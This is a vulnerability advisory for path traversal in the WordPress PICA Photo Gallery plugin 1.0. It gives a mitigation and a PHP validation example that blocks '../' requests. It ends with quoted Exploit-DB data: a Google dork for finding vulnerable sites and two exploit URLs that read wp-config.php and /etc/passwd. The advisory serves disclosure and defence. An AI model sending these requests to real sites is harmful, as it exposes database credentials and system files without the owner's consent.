Vendor: PICA Photo Gallery
By: Sammy FORGIT
CVSS: 7.5 (HIGH)
Type: Remote File Disclosure
CWE: 22
Product Name: PICA Photo Gallery
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: a:wordpress:pica_photo_gallery
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2012

WordPress Plugins – PICA Photo Gallery Remote File Disclosure Vulnerability

A vulnerability in the PICA Photo Gallery plugin for WordPress allows an attacker to download arbitrary files from the server. The 'picadownload.php' script does not validate its 'imgname' parameter, so a value containing directory traversal sequences ('../') can reach files outside the intended directory.

Mitigation:

Validate the 'imgname' parameter so that requests cannot reach files outside the intended directory.
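
One way to implement that validation, as an added example that is not the plugin's code: the function name `resolve_gallery_image()`, the gallery directory and the extension allowlist are assumptions. It allowlists the file name, then confirms that the canonical path still lies inside the gallery directory.

```php
<?php
// Added example, not the plugin's code. resolve_gallery_image() and the
// gallery directory used below are hypothetical names.

// Map a user-supplied image name to a file inside $baseDir, or return null.
function resolve_gallery_image(string $baseDir, string $imgname): ?string
{
    // Allowlist the name itself: no separators, no NUL, no leading dot.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]*\z/', $imgname)) {
        return null;
    }
    // Serve image types only (assumed allowlist).
    $ext = strtolower(pathinfo($imgname, PATHINFO_EXTENSION));
    if (!in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        return null;
    }
    // Canonicalise both paths so "..", "." and symlinks are resolved.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $imgname);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // Containment check on the canonical path; the trailing separator stops
    // "/gallery-private" from matching a base of "/gallery".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary gallery directory holding one sample file.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'gallery_demo_' . getmypid();
mkdir($dir);
$sample = $dir . DIRECTORY_SEPARATOR . 'photo.jpg';
file_put_contents($sample, 'constructed sample');

$requests = ['photo.jpg', '../../../wp-config.php', 'missing.png', 'photo.jpg.php'];
foreach ($requests as $name) {
    $ok = resolve_gallery_image($dir, $name) !== null;
    printf("%-26s => %s\n", $name, $ok ? 'served' : 'rejected');
}

unlink($sample);
rmdir($dir);
```

The canonical-path check is kept after the name allowlist because a symlink placed inside the gallery directory would pass the name check while pointing elsewhere.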

Exploit-DB raw data:

##################################################
# Description : Wordpress Plugins - PICA Photo Gallery Remote File Disclosure Vulnerability
# Version : 1.0
# Link : http://wordpress.org/extend/plugins/pica-photo-gallery/
# Plugins : http://downloads.wordpress.org/plugin/pica-photo-gallery.zip
# Date : 30-05-2012
# Google Dork : inurl:/wp-content/plugins/pica-photo-gallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php

http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd